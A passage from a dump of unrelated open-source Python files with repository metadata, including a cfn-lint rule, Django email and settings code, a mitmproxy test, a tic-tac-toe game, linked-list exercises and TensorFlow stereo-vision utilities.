HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import six
from cfnlint import CloudFormationLintRule
from cfnlint import RuleMatch
class FindInMapKeys(CloudFormationLintRule):
"""Check if FindInMap values are correct"""
id = 'W1011'
shortdesc = 'FindInMap keys exist in the map'
description = 'Checks the keys in a FindInMap to make sure they exist. ' \
'Check only if the Map Name is a string and if the key is a string.'
source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/intrinsic-function-reference-findinmap.html'
tags = ['functions', 'findinmap']
def check_keys(self, map_name, keys, mappings, tree):
""" Check the validity of the first key """
matches = []
first_key = keys[0]
second_key = keys[1]
if isinstance(second_key, (six.string_types, int)):
if isinstance(map_name, (six.string_types)):
mapping = mappings.get(map_name)
if mapping:
if isinstance(first_key, (six.string_types, int)):
if isinstance(map_name, (six.string_types)):
if not mapping.get(first_key):
message = 'FindInMap first key "{0}" doesn\'t exist in map "{1}" at {3}'
matches.append(RuleMatch(
tree[:] + [1],
message.format(first_key, map_name, first_key, '/'.join(map(str, tree)))))
if mapping.get(first_key):
# Don't double error if they first key doesn't exist
if not mapping.get(first_key, {}).get(second_key):
message = 'FindInMap second key "{0}" doesn\'t exist in map "{1}" under "{2}" at {3}'
matches.append(RuleMatch(
tree[:] + [2],
message.format(second_key, map_name, first_key, '/'.join(map(str, tree)))))
else:
for key, value in mapping.items():
if not value.get(second_key):
message = 'FindInMap second key "{0}" doesn\'t exist in map "{1}" under "{2}" at {3}'
matches.append(RuleMatch(
tree[:] + [2],
message.format(second_key, map_name, key, '/'.join(map(str, tree)))))
return matches
def match(self, cfn):
"""Check CloudFormation GetAtt"""
matches = []
findinmaps = cfn.search_deep_keys('Fn::FindInMap')
mappings = cfn.get_mappings()
for findinmap in findinmaps:
tree = findinmap[:-1]
map_obj = findinmap[-1]
if len(map_obj) == 3:
matches.extend(self.check_keys(map_obj[0], map_obj[1:], mappings, tree))
return matches
|
[
"kddejong@amazon.com"
] |
kddejong@amazon.com
|
8b22a1578d5df4953a56da36b6c4398aa6b003a2
|
d2e80a7f2d93e9a38f37e70e12ff564986e76ede
|
/Python-cookbook-2nd/cb2_15/cb2_15_1_exm_1.py
|
1ed468d0c137493859fbf02087e909f3b6df71d7
|
[] |
no_license
|
mahavivo/Python
|
ceff3d173948df241b4a1de5249fd1c82637a765
|
42d2ade2d47917ece0759ad83153baba1119cfa1
|
refs/heads/master
| 2020-05-21T10:01:31.076383
| 2018-02-04T13:35:07
| 2018-02-04T13:35:07
| 54,322,949
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
from xmlrpclib import Server
server = Server("http://www.oreillynet.com/meerkat/xml-rpc/server.php")
class MeerkatQuery(object):
def __init__(self, search, num_items=5, descriptions=0):
self.search = search
self.num_items = num_items
self.descriptions = descriptions
q = MeerkatQuery("[Pp]ython")
print server.meerkat.getItems(q)
|
[
"mahavivo@126.com"
] |
mahavivo@126.com
|
616900694b0862636d221e3a8773a98780b7afd3
|
493c7d9678a0724736fb9dd7c69580a94099d2b4
|
/apps/utils/email_send.py
|
36fe5822fba9d09e3c79655bd951767e0024091b
|
[] |
no_license
|
cuixiaozhao/MxOnline
|
e253c8c5f5fa81747d8e1ca064ce032e9bd42566
|
c96ae16cea9ad966df36e9fcacc902c2303e765c
|
refs/heads/master
| 2020-03-29T18:47:11.158275
| 2018-10-22T14:06:50
| 2018-10-22T14:06:50
| 150,231,387
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,622
|
py
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# Project: MxOnline
# Software: PyCharm
# Time : 2018-09-27 18:41
# File : email_send.py
# Author : 天晴天朗
# Email : tqtl@tqtl.org
from users.models import EmailVerifyRecord
from random import Random
from django.core.mail import send_mail
from MxOnline.settings import EMAIL_FROM
def random_str(randomlength=8):
str = ''
chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz01234567890'
length = len(chars) - 1
random = Random()
for i in range(randomlength):
str += chars[random.randint(0, length)]
return str
def send_register_email(email, send_type="register"):
email_record = EmailVerifyRecord()
code = random_str(16)
email_record.code = code
email_record.email = email
email_record.send_type = send_type
email_record.save()
# 定义E-mail的主题与主体内容;
email_title = ""
email_body = ""
if send_type == "register":
email_title = "慕学在线网注册激活链接"
email_body = "请点击下面的链接来激活你的账号:http://127.0.0.1:8000/active/{0}".format(code)
send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])
if send_status:
pass
elif send_type == "forget":
email_title = "慕学在线网重置链接"
email_body = "请点击下面的链接来重置你的账号:http://127.0.0.1:8000/reset/{0}".format(code)
send_status = send_mail(email_title, email_body, EMAIL_FROM, [email])
if send_status:
pass
def generate_random_str():
pass
|
[
"19930911cXS"
] |
19930911cXS
|
ecfe7678744fa8d9f0e8c01aab200b5c1f9f6562
|
6fb1d9f617ad89c5ac7e4280f07a88bdb8b02aee
|
/test/mitmproxy/builtins/test_setheaders.py
|
41c1836059fa20e5bf5afa43edf5bd300b45f47c
|
[
"MIT"
] |
permissive
|
tigerqiu712/mitmproxy
|
e689f5d87e91837a6853b1a1402269ba3be4fcbc
|
dcfa7027aed5a8d4aa80aff67fc299298659fb1b
|
refs/heads/master
| 2021-01-12T22:38:19.735004
| 2016-08-04T22:39:48
| 2016-08-04T22:39:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,925
|
py
|
from .. import tutils, mastertest
from mitmproxy.builtins import setheaders
from mitmproxy.flow import state
from mitmproxy import options
class TestSetHeaders(mastertest.MasterTest):
def mkmaster(self, **opts):
s = state.State()
o = options.Options(**opts)
m = mastertest.RecordingMaster(o, None, s)
sh = setheaders.SetHeaders()
m.addons.add(o, sh)
return m, sh
def test_configure(self):
sh = setheaders.SetHeaders()
o = options.Options(
setheaders = [("~b", "one", "two")]
)
tutils.raises(
"invalid setheader filter pattern",
sh.configure, o, o.keys()
)
def test_setheaders(self):
m, sh = self.mkmaster(
setheaders = [
("~q", "one", "two"),
("~s", "one", "three")
]
)
f = tutils.tflow()
f.request.headers["one"] = "xxx"
self.invoke(m, "request", f)
assert f.request.headers["one"] == "two"
f = tutils.tflow(resp=True)
f.response.headers["one"] = "xxx"
self.invoke(m, "response", f)
assert f.response.headers["one"] == "three"
m, sh = self.mkmaster(
setheaders = [
("~s", "one", "two"),
("~s", "one", "three")
]
)
f = tutils.tflow(resp=True)
f.request.headers["one"] = "xxx"
f.response.headers["one"] = "xxx"
self.invoke(m, "response", f)
assert f.response.headers.get_all("one") == ["two", "three"]
m, sh = self.mkmaster(
setheaders = [
("~q", "one", "two"),
("~q", "one", "three")
]
)
f = tutils.tflow()
f.request.headers["one"] = "xxx"
self.invoke(m, "request", f)
assert f.request.headers.get_all("one") == ["two", "three"]
|
[
"aldo@nullcube.com"
] |
aldo@nullcube.com
|
6db9bb5b24703aab877180c00f818cc1d8c49db5
|
8d13818c4aa7e32df594b3859344812669fd26f1
|
/school_navigator/settings/deploy.py
|
7d1186222c366849ebeca052151a059af60ef6a0
|
[] |
no_license
|
rosalsm/school-navigator
|
ee4ea47d9845900b22836b93bdc82862a8e53741
|
a41cb0721da3f7c7cd43ae76f162db51c764d8ea
|
refs/heads/master
| 2020-12-07T03:50:24.615270
| 2016-03-09T02:37:12
| 2016-03-09T02:37:12
| 54,512,859
| 0
| 0
| null | 2016-03-22T22:25:43
| 2016-03-22T22:25:42
| null |
UTF-8
|
Python
| false
| false
| 1,893
|
py
|
# Settings for live deployed environments: vagrant, staging, production, etc
from .base import * # noqa
os.environ.setdefault('CACHE_HOST', '127.0.0.1:11211')
os.environ.setdefault('BROKER_HOST', '127.0.0.1:5672')
ENVIRONMENT = os.environ['ENVIRONMENT']
DEBUG = False
DATABASES['default']['NAME'] = 'school_navigator_%s' % ENVIRONMENT.lower()
DATABASES['default']['USER'] = 'school_navigator_%s' % ENVIRONMENT.lower()
DATABASES['default']['HOST'] = os.environ.get('DB_HOST', '')
DATABASES['default']['PORT'] = os.environ.get('DB_PORT', '')
DATABASES['default']['PASSWORD'] = os.environ.get('DB_PASSWORD', '')
WEBSERVER_ROOT = '/var/www/school_navigator/'
PUBLIC_ROOT = os.path.join(WEBSERVER_ROOT, 'public')
STATIC_ROOT = os.path.join(PUBLIC_ROOT, 'static')
MEDIA_ROOT = os.path.join(PUBLIC_ROOT, 'media')
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '%(CACHE_HOST)s' % os.environ,
}
}
EMAIL_SUBJECT_PREFIX = '[School_Navigator %s] ' % ENVIRONMENT.title()
DEFAULT_FROM_EMAIL = 'noreply@%(DOMAIN)s' % os.environ
SERVER_EMAIL = DEFAULT_FROM_EMAIL
COMPRESS_ENABLED = True
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
ALLOWED_HOSTS = [os.environ['DOMAIN']]
# Uncomment if using celery worker configuration
CELERY_SEND_TASK_ERROR_EMAILS = True
BROKER_URL = 'amqp://school_navigator_%(ENVIRONMENT)s:%(BROKER_PASSWORD)s@%(BROKER_HOST)s/school_navigator_%(ENVIRONMENT)s' % os.environ # noqa
# Environment overrides
# These should be kept to an absolute minimum
if ENVIRONMENT.upper() == 'LOCAL':
# Don't send emails from the Vagrant boxes
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
ADMINS = (
('Colin Copeland', 'ccopeland@codeforamerica.org'),
)
MANAGERS = ADMINS
LOGGING['handlers']['file']['filename'] = '/var/www/school_navigator/log/schools.log'
|
[
"copelco@caktusgroup.com"
] |
copelco@caktusgroup.com
|
d916feda1d6f1e80da823656bd4c71d6f4dd5a02
|
d0d1e07c984651f96bd9386d546c85c0341e46b2
|
/timedata/control/envelope/segments.py
|
16160ce32aeb7e7df7a512c946d3aac288a9636c
|
[
"MIT"
] |
permissive
|
timedata-org/timedata
|
61cde905b1fe9eb60ac83ecbf5a5a2114793c45d
|
3faac7450678aaccd4a283d0d41ca3e7f113f51b
|
refs/heads/master
| 2020-04-11T12:03:57.962646
| 2019-06-09T10:05:16
| 2019-06-09T10:05:52
| 51,217,217
| 5
| 3
| null | 2016-09-18T16:20:43
| 2016-02-06T19:13:43
|
C++
|
UTF-8
|
Python
| false
| false
| 1,116
|
py
|
class Segments(list):
"""
A list of [level, time] pairs.
"""
def __init__(self, segments=(), length=None):
super().__init__()
self.base_value = 0
for segment in segments:
try:
level, time = segment
except TypeError:
level, time = segment, None
self.append([level, time])
times = [t for s, t in self if t is not None]
if times:
mean = sum(times) / len(times)
else:
mean = (length or 1) / max(1, len(self))
for segment in self:
if segment[1] is None:
segment[1] = mean
self.total_time = sum(t for l, t in self)
def __call__(self, time, base_value=0):
elapsed_time = 0
level = base_value
for l, t in self:
segment_end_time = elapsed_time + t
if time < segment_end_time:
delta_t = time - elapsed_time
return level + (l - level) * delta_t / t
elapsed_time = segment_end_time
level = l
return level
|
[
"tom@swirly.com"
] |
tom@swirly.com
|
474c9f5e02f118f0f06da4331b7c2bd065301b36
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/NyTjy8nmHj9bmxMTC_14.py
|
e3c771df7a753dd5a3ce288cd92845294dcedb72
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
import math
from decimal import Decimal
def vol_pizza(radius, height):
solution = radius*radius*height*math.pi
decSol = Decimal(solution)
return round(decSol)
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
dd2c7c4d2446ea1919e10264fc0438137e66880e
|
f2d1362eea91a090cdec4f232ef168f0837a5f5d
|
/tests/bench/ssh-roundtrip.py
|
8745505d2470f6f5065b38cb82c7fa585e3ac501
|
[
"BSD-3-Clause"
] |
permissive
|
marc1006/mitogen
|
2296e7d7618d130efcd42d355ace16d536237364
|
2ed8395d6ce2adc6a252b68c310646707348f3a1
|
refs/heads/master
| 2022-05-19T19:38:30.053265
| 2019-08-08T16:50:40
| 2019-08-08T16:54:33
| 201,296,264
| 0
| 0
| null | 2019-08-08T16:25:20
| 2019-08-08T16:25:20
| null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
"""
Measure latency of SSH RPC.
"""
import sys
import time
import mitogen
import mitogen.utils
import ansible_mitogen.affinity
mitogen.utils.setup_gil()
ansible_mitogen.affinity.policy.assign_worker()
try:
xrange
except NameError:
xrange = range
def do_nothing():
pass
@mitogen.main()
def main(router):
f = router.ssh(hostname=sys.argv[1])
f.call(do_nothing)
t0 = time.time()
end = time.time() + 5.0
i = 0
while time.time() < end:
f.call(do_nothing)
i += 1
t1 = time.time()
print('++', float(1e3 * (t1 - t0) / (1.0+i)), 'ms')
|
[
"dw@botanicus.net"
] |
dw@botanicus.net
|
dbddee33c2e3dad0c8f9955deb3e40d75449a052
|
cebf2e5276e6d064d0ec86beaf1129fe0d0fd582
|
/days081-090/day083/project/tic_tac_toe.py
|
04fa7c9806b6d01e22dbdb0233b6d24bcf3ad8d4
|
[] |
no_license
|
SheikhFahimFayasalSowrav/100days
|
532a71c5c790bc28b9fd93c936126a082bc415f5
|
0af9f2f16044facc0ee6bce96ae5e1b5f88977bc
|
refs/heads/master
| 2023-06-14T06:18:44.109685
| 2021-07-08T16:58:13
| 2021-07-08T16:58:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,504
|
py
|
import random
EMPTY = '_'
CROSS = 'X️'
DOT = 'O'
class TicTacToe:
POS_DICT = {
1: (0, 0),
2: (0, 1),
3: (0, 2),
4: (1, 0),
5: (1, 1),
6: (1, 2),
7: (2, 0),
8: (2, 1),
9: (2, 2),
}
def __init__(self, players):
self.board = [[EMPTY for _i in range(3)] for _j in range(3)]
self.winners = {'DRAW': 0, players[0].upper(): 0, players[1].upper(): 0}
self.player1 = random.choice(players)
players.remove(self.player1)
self.player2 = players[0]
self.round = 1
self.turn = 0
self.game_over = False
def start(self):
print('\nRules:')
print(' Player 1 always starts.')
print(' Players are selected randomly for first round.')
print(' Player 1 is "X", Player 2 is "O".')
print(' You must select a number from 1 to 9')
print('when choosing a move, as follows:')
print('\n 1 2 3\n 4 5 6\n 7 8 9')
print('\nFor this round:')
print('Player 1:', self.player1)
print('Player 2:', self.player2)
def convert_pos(self, index):
return self.POS_DICT.get(index, None)
def is_available(self, row, col):
return self.board[row][col] == EMPTY
def play(self):
index = int(input(f'Enter a position on the board {self.player1 if self.turn % 2 == 0 else self.player2}: '))
pos = self.convert_pos(index)
if pos is None:
print('Invalid position entered!')
return False
row, col = pos
if not self.is_available(row, col):
print('Position is not a free space!')
return False
self.board[row][col] = CROSS if self.turn % 2 == 0 else DOT
self.turn += 1
return True
def reset(self):
if input('Type "yes" if you wish to keep playing? ').lower() == 'yes':
self.board = [[EMPTY for _i in range(3)] for _j in range(3)]
self.turn = 0
self.round += 1
self.player1, self.player2 = self.player2, self.player1
print("\nATTENTION: The players have been switched!!!")
print('\nFor this round:')
print('Player 1:', self.player1)
print('Player 2:', self.player2)
else:
self.game_over = True
def final_output(self):
print(f"\nYou have played {self.round} rounds.\n")
for winner, score in self.winners.items():
print(f'{winner} won {score} times.')
del self.winners['DRAW']
winner = max(self.winners, key=self.winners.get)
print(f'\n{winner} is the final winner!')
def check_board(self):
b_dict = {
1: self.board[0][0],
2: self.board[0][1],
3: self.board[0][2],
4: self.board[1][0],
5: self.board[1][1],
6: self.board[1][2],
7: self.board[2][0],
8: self.board[2][1],
9: self.board[2][2],
}
if b_dict[1] == b_dict[2] == b_dict[3] or b_dict[1] == b_dict[4] == b_dict[7]:
return b_dict[1]
if b_dict[4] == b_dict[5] == b_dict[6] or b_dict[2] == b_dict[5] == b_dict[8]:
return b_dict[5]
if b_dict[7] == b_dict[8] == b_dict[9] or b_dict[3] == b_dict[6] == b_dict[9]:
return b_dict[9]
if b_dict[1] == b_dict[5] == b_dict[9] or b_dict[3] == b_dict[5] == b_dict[7]:
return b_dict[5]
def check_game(self):
if self.turn == 9:
self.winners['DRAW'] += 1
print("\nFinal board:")
print(self)
print("It's a DRAW!")
self.reset()
if self.turn >= 5:
winner = self.check_board()
if winner != EMPTY and winner is not None:
print("\nFinal board:")
print(self)
winner_name = self.player1 if winner == CROSS else self.player2
print(f'This round was won by {winner_name}!')
self.winners[winner_name.upper()] += 1
self.reset()
def __str__(self):
lines = [' '.join(self.board[x]) for x in range(3)]
return '\n'.join(lines)
print("Welcome to Tic Tac Toe!")
game = TicTacToe(input('Enter the name for the players: ').split())
game.start()
while not game.game_over:
print("\nCurrent board: ")
print(game)
if game.play():
game.check_game()
game.final_output()
|
[
"pullynnhah@icloud.com"
] |
pullynnhah@icloud.com
|
8511a92526362590653b4d46e0952834d47a5b81
|
2871a5c3d1e885ee72332dbd8ff2c015dbcb1200
|
/SteReFo/stereonet/utils.py
|
65da3b85dd3f3fd2addb467268b0901a7c58105a
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
huawei-noah/noah-research
|
297476299ad040552e44656541858145de72d141
|
82c49c36b76987a46dec8479793f7cf0150839c6
|
refs/heads/master
| 2023-08-16T19:29:25.439701
| 2023-08-14T03:11:49
| 2023-08-14T03:11:49
| 272,853,727
| 816
| 171
| null | 2023-09-12T01:28:36
| 2020-06-17T01:53:20
|
Python
|
UTF-8
|
Python
| false
| false
| 4,760
|
py
|
#Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#This program is free software; you can redistribute it and/or modify it under the terms of the BSD 0-Clause License.
#This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD 0-Clause License for more details.
import tensorflow as tf
import numpy as np
import re
def conv2d(inputs, filters, kernel_size, name, strides=1, dilation_rate=1):
return tf.layers.conv2d(inputs=inputs, filters=filters, kernel_size=kernel_size, strides=strides, padding='same',
kernel_initializer=tf.contrib.layers.xavier_initializer(),bias_initializer=tf.zeros_initializer(),dilation_rate=dilation_rate,
name=name)
def conv3d(input,num_outputs,kernel_size,name):
return tf.layers.conv3d(inputs=input,filters=num_outputs,kernel_size=kernel_size,kernel_initializer=tf.contrib.layers.xavier_initializer(),activation=None,padding='same',name=name)
def resnet_block(inputs, filters, kernel_size, name, dilation_rate=1):
out = conv2d(inputs=inputs, filters=filters, kernel_size=kernel_size, name=name + '_conv1', dilation_rate=dilation_rate)
out = tf.nn.relu(out,name=name + '_relu1')
out = conv2d(inputs=out, filters=filters, kernel_size=kernel_size, name=name + '_conv2', dilation_rate=dilation_rate)
out = tf.add(out, inputs, name=name + '_add')
out = tf.nn.relu(out,name=name + '_relu2')
return out
def lcn_preprocess(input_tensor):
"""
Returns the normalised and centered values of a tensor, along with its standard dev.
"""
full_h = int(input_tensor.shape[1])
full_w = int(input_tensor.shape[2])
##compute local averages
ones = tf.ones_like(input_tensor)
avg_filter = tf.ones([9,9,3,1],dtype=tf.float32,name='avg_filter')
divide_weight = tf.nn.convolution(ones,filter=avg_filter,padding='SAME')
input_tensor_avg = tf.nn.convolution(input_tensor,filter=avg_filter,padding='SAME') / divide_weight
#compute local std dev
padded_left = tf.pad(input_tensor,[[0,0],[4,4],[4,4],[0,0]])
padded_ones = tf.pad(ones,[[0,0],[4,4],[4,4],[0,0]])
input_tensor_std = tf.zeros_like(input_tensor)
for x in range(9):
for y in range(9):
input_tensor_std += tf.square(padded_left[:,y:y+full_h,x:x+full_w,:] - input_tensor_avg) * padded_ones[:,y:y+full_h,x:x+full_w,:]
const = 1e-10
input_tensor_std = tf.sqrt((input_tensor_std + const) / divide_weight)
#Center input around mean
input_tensor = (input_tensor - input_tensor_avg) / (input_tensor_std + const)
return input_tensor
def readPFM(file):
'''
This code is from https://lmb.informatik.uni-freiburg.de/resources/datasets/SceneFlowDatasets.en.html
'''
file = open(file, 'rb')
color = None
width = None
height = None
scale = None
endian = None
header = file.readline().rstrip()
if header.decode("ascii") == 'PF':
color = True
elif header.decode("ascii") == 'Pf':
color = False
else:
raise Exception('Not a PFM file.')
dim_match = re.match(r'^(\d+)\s(\d+)\s$', file.readline().decode("ascii"))
if dim_match:
width, height = list(map(int, dim_match.groups()))
else:
raise Exception('Malformed PFM header.')
scale = float(file.readline().decode("ascii").rstrip())
if scale < 0: # little-endian
endian = '<'
scale = -scale
else:
endian = '>' # big-endian
data = np.fromfile(file, endian + 'f')
shape = (1,height, width, 3) if color else (height, width)
data = np.reshape(data, shape)
data = np.flipud(data)
return data
def writePFM(file, image, scale=1):
'''
This code is from https://lmb.informatik.uni-freiburg.de/resources/datasets/SceneFlowDatasets.en.html
'''
file = open(file, 'wb')
color = None
if image.dtype.name != 'float32':
raise Exception('Image dtype must be float32.')
image = np.flipud(image)
if len(image.shape) == 3 and image.shape[2] == 3: # color image
color = True
elif len(image.shape) == 2 or len(image.shape) == 3 and image.shape[2] == 1: # greyscale
color = False
else:
raise Exception('Image must have H x W x 3, H x W x 1 or H x W dimensions.')
file.write('PF\n' if color else 'Pf\n'.encode())
file.write('%d %d\n'.encode() % (image.shape[1], image.shape[0]))
endian = image.dtype.byteorder
if endian == '<' or endian == '=' and sys.byteorder == 'little':
scale = -scale
file.write('%f\n'.encode() % scale)
image.tofile(file)
|
[
"noreply@github.com"
] |
huawei-noah.noreply@github.com
|
dfae7ec2e5295d75dd18efa6da46fbd208bce081
|
b8c4ef9ccab22717ab97ab2fb100614d962a5820
|
/src/main/python/com/skalicky/python/interviewpuzzles/merge_multiple_sorted_linked_lists.py
|
1ac1c3dc9ac3a02f3b3c233c860d355c4f9dda3f
|
[] |
no_license
|
Sandeep8447/interview_puzzles
|
1d6c8e05f106c8d5c4c412a9f304cb118fcc90f4
|
a3c1158fe70ed239f8548ace8d1443a431b644c8
|
refs/heads/master
| 2023-09-02T21:39:32.747747
| 2021-10-30T11:56:57
| 2021-10-30T11:56:57
| 422,867,683
| 0
| 0
| null | 2021-10-30T11:56:58
| 2021-10-30T11:55:17
| null |
UTF-8
|
Python
| false
| false
| 3,633
|
py
|
# Task:
#
# You are given an array of k sorted singly linked lists. Merge the linked lists into a single sorted linked list and
# return it.
#
# Here's your starting point:
#
# class Node(object):
# def __init__(self, val, next=None):
# self.val = val
# self.next = next
#
# def __str__(self):
# c = self
# answer = ""
# while c:
# answer += str(c.val) if c.val else ""
# c = c.next
# return answer
#
# def merge(lists):
# # Fill this in.
#
# a = Node(1, Node(3, Node(5)))
# b = Node(2, Node(4, Node(6)))
# print merge([a, b])
# # 123456
from typing import List, Optional
class Node:
def __init__(self, val: int, next_node=None):
self.val: int = val
self.next_node: Node = next_node
def __str__(self):
current: Node = self
answer = ""
while current:
answer += str(current.val) if current.val else ""
current = current.next_node
return answer
def set_next_node_and_determine_beginning(beginning: Node, current: Node, next_node: Node):
if current:
current.next_node = next_node
return beginning, next_node
else:
return next_node, next_node
def merge_two_lists(first: Node, second: Node):
first_current: Node = first
second_current: Node = second
result_beginning: Optional[Node] = None
result_current: Optional[Node] = None
while first_current and second_current:
if first_current.val <= second_current.val:
result_beginning, result_current = set_next_node_and_determine_beginning(result_beginning,
result_current,
first_current)
first_current = first_current.next_node
else:
result_beginning, result_current = set_next_node_and_determine_beginning(result_beginning,
result_current,
second_current)
second_current = second_current.next_node
if not first_current and second_current:
result_beginning, result_current = set_next_node_and_determine_beginning(result_beginning,
result_current,
second_current)
if not second_current and first_current:
result_beginning, result_current = set_next_node_and_determine_beginning(result_beginning,
result_current,
first_current)
return result_beginning
def merge(lists: List[Node]):
if len(lists) == 0:
return ''
else:
current_lists: List[Node] = lists
while len(current_lists) > 1:
last: Node = current_lists.pop()
one_before_last: Node = current_lists.pop()
current_lists.append(merge_two_lists(last, one_before_last))
return current_lists[0]
list1 = Node(1, Node(3, Node(5)))
list2 = Node(3, Node(4, Node(6, Node(7))))
list3 = Node(2, Node(8))
list4 = Node(9)
print(merge([list1, list2, list3, list4]))
# 123456
print(merge([]))
#
list5 = Node(1, Node(3, Node(5)))
print(merge([list5]))
# 135
list6 = Node(1, Node(3, Node(5)))
list7 = None
print(merge([list6, list7]))
# 135
|
[
"skalicky.tomas@gmail.com"
] |
skalicky.tomas@gmail.com
|
06a1015299b1742df49a3baa3691aa1c0bcdbb5f
|
71f3ecb8fc4666fcf9a98d39caaffc2bcf1e865c
|
/.history/第4章/lian1_20200608191011.py
|
322b31fe7018eb95ef28b4b5924a2532c3a1b951
|
[
"MIT"
] |
permissive
|
dltech-xyz/Alg_Py_Xiangjie
|
03a9cac9bdb062ce7a0d5b28803b49b8da69dcf3
|
877c0f8c75bf44ef524f858a582922e9ca39bbde
|
refs/heads/master
| 2022-10-15T02:30:21.696610
| 2020-06-10T02:35:36
| 2020-06-10T02:35:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,524
|
py
|
#!/usr/bin/env python
# coding=utf-8
'''
@version:
@Author: steven
@Date: 2020-05-27 22:20:22
@LastEditors: steven
@LastEditTime: 2020-06-08 19:10:11
@Description:
'''
class Node(object):
# 在python 3 中已经默认就帮你加载了object了(即便你没有写上object)。https://my.oschina.net/zhengtong0898/blog/636468
def __init__(self, data, pnext = None):
"""
data:节点保存的数据
_next:保存下一个节点对象
"""
self.data = data
self._next = pnext
def __repr__(self):
"""
用于定义Node的字符输出,
?print用于输出data
"""
return str(self.data)
class ChainTable(object):
def __init__(self):
self.head = None
self.length = 0
def isEmpty(self):
return (self.length == 0)
def append(self, dataOrNode):
item = None
if isinstance(dataOrNode, Node):
item = dataOrNode
else:
item = Node(dataOrNode)
if not self.head:
self.head = item
self.length += 1
else:
# 移动到已有的最后节点。
node = self.head
while node._next:
node = node._next
node._next = item
self.length += 1
def delete(self, index):
if self.isEmpty():
print("this chain table is empty.")
return
if index < 0 or index >= self.length:
print('error: out of index')
return
if index == 0:
self.head = self.head._next
self.length -= 1
return
j = 0
node = self.head
prev = self.head
while node._next and j < index:
prev = node
node = node._next
j += 1
if j == index:
prev._next = node._next
self.length -= 1
def insert(self, index, dataOrNode):
if self.isEmpty():
print("this chain tabale is empty")
return
if index < 0 or index >= self.length:
print("error: out of index")
return
item = None
if isinstance(dataOrNode, Node):
item = dataOrNode
else:
item = Node(dataOrNode)
if index == 0:
item._next = self.head
self.head = item
self.length += 1
return
j = 0
node = self.head
prev = self.head
while node._next and j < index:
prev = node
node = node._next
j += 1
if j == index:
item._next = node
prev._next = item
self.length += 1
def update(self, index, data):
if self.isEmpty() or index < 0 or index >= self.length:
print('error: out of index')
return
j = 0
node = self.head
while node._next and j < index:
node = node._next
j += 1
if j == index:
node.data = data
def getItem(self, index):
if self.isEmpty() or index < 0 or index >= self.length:
print("error: out of index")
return
j = 0
node = self.head
while node._next and j < index:
node = node._next
j += 1
return node.data
def getIndex(self, data):
j = 0
if self.isEmpty():
print("this chain table is empty")
return
node = self.head
while node:
if node.data == data:
return j
node = node._next
j += 1
if j == self.length:
print("%s not found" % str(data))
return
def clear(self):
self.head = None
self.length = 0
def __repr__(self):
if self.isEmpty():
return("empty chain table")
node = self.head
nlist = ''
while node:
nlist += str(node.data) + ' '
node = node._next
return nlist
def __getitem__(self, ind):
if self.isEmpty() or ind < 0 or ind >= self.length:
print("error: out of index")
return
return self.getItem(ind)
def __setitem__(self, ind, val):
if self.isEmpty() or ind < 0 or ind >= self.length:
print("error: out of index")
return
self.update(ind, val)
def __len__(self):
return self.length
|
[
"a867907127@gmail.com"
] |
a867907127@gmail.com
|
bf726f5207709908e58489b515b521a76322c265
|
a5a33e7446e9af18be7861f8e5b44e33fcfed9e1
|
/users/admin.py
|
8d272c18906bd46236e726c597ce2eea308721c4
|
[] |
no_license
|
akabhi5/url-shortener-django-api
|
75afc14f167310a7a22429650a504da820627924
|
33a1fd3f52ce95b8d68ba706ce91cdfd95f95e53
|
refs/heads/main
| 2023-09-02T19:21:40.524613
| 2021-11-16T16:47:12
| 2021-11-16T16:47:12
| 380,212,386
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 911
|
py
|
# users/admin.py
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import Group
from django.contrib import admin
from users.forms import UserChangeForm, UserCreationForm
from users.models import User
class UserAdmin(BaseUserAdmin):
form = UserChangeForm
add_form = UserCreationForm
list_display = ('email', 'is_admin')
list_filter = ('is_admin',)
fieldsets = (
(None, {'fields': ('email', 'password', 'first_name', 'last_name',)}),
('Permissions', {'fields': ('is_admin',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'password1', 'password2'),
}),
)
search_fields = ('email',)
ordering = ('email',)
filter_horizontal = ()
class Meta:
model = User
admin.site.register(User, UserAdmin)
admin.site.unregister(Group)
|
[
"abhishekk580@gmail.com"
] |
abhishekk580@gmail.com
|
e6172fd041838054a0760cdc1ac341bcfcf3bb15
|
bd1b1fda138e6687dadc57317c3e312bc8872600
|
/mycode/leetcode2017/Hash/359 Logger Rate Limiter.py
|
af15b46efce80851b00ad6e66769fec1c7c88d72
|
[] |
no_license
|
dundunmao/lint_leet
|
